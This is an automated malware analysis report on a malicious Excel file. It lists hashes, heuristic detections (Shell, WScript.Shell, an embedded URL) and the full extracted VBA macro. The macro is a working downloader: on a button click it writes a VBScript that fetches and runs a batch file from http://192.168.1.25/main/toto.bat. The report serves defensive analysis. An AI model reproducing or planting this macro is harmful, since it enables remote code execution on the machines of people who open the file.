Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cde3d5a5ac8469e4…

MALICIOUS

Office (OOXML)

21.5 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-03-01
MD5: 497d048dd4b1d118beab357dbd8cd8df SHA-1: 5782e0b9105345046ebfd7b5501b8f4c68f26d93 SHA-256: cde3d5a5ac8469e42f75c67d017dc5e277fe943aca9cb156c979711e1d91df1e
242 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell Replace("wscript ""FILE"" ", "FILE", myFile)
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set oShell = CreateObject("WScript.Shell")
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
        Set oShell = CreateObject("WScript.Shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set oShell = CreateObject("WScript.Shell")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.1.25/main/toto.bat Referenced by macro

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2866 bytes
SHA-256: ff51d3c8685547d284d01cc21f3e02afb97b123bb0b1c02da507cddd71c93d8f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Feuil1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton"
Private Sub CommandButton1_Click()
    Dim myoutputfile As Integer
    Dim FilePath As String
    Set oShell = CreateObject("WScript.Shell")
    userProfilePath = oShell.ExpandEnvironmentStrings("%UserProfile%")
    
    myFile = userProfilePath + "\toto.vbs"
    myoutputfile = FreeFile
    Open myFile For Output As #myoutputfile
    Print #myoutputfile, "HTTPDownload ""http://192.168.1.25/main/toto.bat"", """ & userProfilePath & """"; ""
    Print #myoutputfile, "Sub HTTPDownload( myURL, myPath )"
    Print #myoutputfile, "     Dim i, objFile, objFSO, objHTTP, strFile, strMsg"
    Print #myoutputfile, "     Const ForReading = 1, ForWriting = 2, ForAppending = 8"
    Print #myoutputfile, "     Set objFSO = CreateObject(""Scripting.FileSystemObject"")"
    Print #myoutputfile, "     If objFSO.FolderExists(myPath) Then"
    Print #myoutputfile, "          strFile = objFSO.BuildPath(myPath, Mid(myURL, InStrRev(myURL, ""/"") + 1))"
    Print #myoutputfile, "     ElseIf objFSO.FolderExists(Left(myPath, InStrRev(myPath, "" \ "") - 1)) Then"
    Print #myoutputfile, "          strFile = myPath"
    Print #myoutputfile, "     Else"
    Print #myoutputfile, "          WScript.Echo ""ERROR: Target folder not found."""
    Print #myoutputfile, "          Exit Sub"
    Print #myoutputfile, "     End If"
    Print #myoutputfile, "     Set objFile = objFSO.OpenTextFile(strFile, ForWriting, True)"
    Print #myoutputfile, "     Set objHTTP = CreateObject(""WinHttp.WinHttpRequest.5.1"")"
    Print #myoutputfile, "     objHTTP.Open ""GET"", myURL, False"
    Print #myoutputfile, "     objHTTP.Send"
    Print #myoutputfile, "     For i = 1 To LenB(objHTTP.ResponseBody)"
    Print #myoutputfile, "          objFile.Write Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))"
    Print #myoutputfile, "     Next"
    Print #myoutputfile, "     objFile.Close( )"
    Print #myoutputfile, "     Set WshShell = WScript.CreateObject(""WScript.Shell"")"
    Print #myoutputfile, "     WshShell.Run ""%UserProfile%\toto.bat"",2 "
   
    Print #myoutputfile, "End Sub"
    Close #myoutputfile
    Shell Replace("wscript ""FILE"" ", "FILE", myFile)
End Sub


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 24576 bytes
SHA-256: 504d4e7d1a9cfc6064c23c1384f81f87bdf93b0c5d23d358bb0e506a488bb42e
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 2672 bytes
SHA-256: 9059f8e1dbc03e175023d77f26af1f105919e0ebe79e2dd340152764226f7ca2